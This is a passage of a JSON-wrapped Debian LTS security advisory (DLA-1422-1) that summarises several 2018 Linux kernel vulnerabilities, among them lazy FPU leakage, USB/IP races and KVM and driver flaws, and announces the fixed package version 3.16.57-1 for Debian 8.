access control to\n avoid saving and restoring those registers for tasks that do not\n use them, and was enabled by default on x86 processors that do\n not support the XSAVEOPT instruction.\n\n If "lazy FPU" is enabled on one of the affected processors, an\n attacker controlling an unprivileged process may be able to read\n sensitive information from other users' processes or the kernel.\n This specifically affects processors based on the "Nehalem" and\n "Westemere" core designs.\n \n This issue has been mitigated by disabling "lazy FPU" by default\n on all x86 processors that support the FXSAVE and FXRSTOR\n instructions, which includes all processors known to be affected\n and most processors that perform speculative execution. It can\n also be mitigated by adding the kernel parameter: eagerfpu=on\n\nCVE-2018-5814\n\n Jakub Jirasek reported race conditions in the USB/IP host driver.\n A malicious client could use this to cause a denial of service\n (crash or memory corruption), and possibly to execute code, on a\n USB/IP server.\n\nCVE-2018-9422\n\n It was reported that the futex() system call could be used by an\n unprivileged user for privilege escalation.\n\nCVE-2018-10853\n\n Andy Lutomirski and Mika Penttil\u00e4 reported that KVM for x86\n processors did not perform a necessary privilege check when\n emulating certain instructions. This could be used by an\n unprivileged user in a guest VM to escalate their privileges\n within the guest.\n\nCVE-2018-10940\n\n Dan Carpenter reported that the optical disc driver (cdrom) does\n not correctly validate the parameter to the CDROM_MEDIA_CHANGED\n ioctl. A user with access to a cdrom device could use this to\n cause a denial of service (crash).\n\nCVE-2018-11506\n\n Piotr Gabriel Kosinski and Daniel Shapira reported that the\n SCSI optical disc driver (sr) did not allocate a sufficiently\n large buffer for sense data. A user with access to a SCSI\n optical disc device that can produce more than 64 bytes of\n sense data could use this to cause a denial of service (crash\n or memory corruption), and possibly for privilege escalation.\n\nCVE-2018-12233\n\n Shankara Pailoor reported that a crafted JFS filesystem image\n could trigger a denial of service (memory corruption). This\n could possibly also be used for privilege escalation.\n\nCVE-2018-1000204\n\n The syzbot software found that the SCSI generic driver (sg) would\n in some circumstances allow reading data from uninitialised\n buffers, which could include sensitive information from the kernel\n or other tasks. However, only privileged users with the\n CAP_SYS_ADMIN or CAP_SYS_RAWIO capability were allowed to do this,\n so this has little or no security impact.\n\nFor Debian 8 "Jessie", these problems have been fixed in version\n3.16.57-1. This update additionally fixes Debian bug #898165, and\nincludes many more bug fixes from stable update 3.16.57.\n\nWe recommend that you upgrade your linux packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n\n-- \nBen Hutchings - Debian developer, member of kernel, installer and LTS teams", "modified": "2018-07-14T19:32:34", "published": "2018-07-14T19:32:34", "id": "DEBIAN:DLA-1422-1:EBC6F", "href": "https://lists.debian.org/debian-lts-announce/2018/debian-lts-announce-201807/msg00015.html", "title": "[SECURITY] [DLA 1422-1] linux security update", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}]}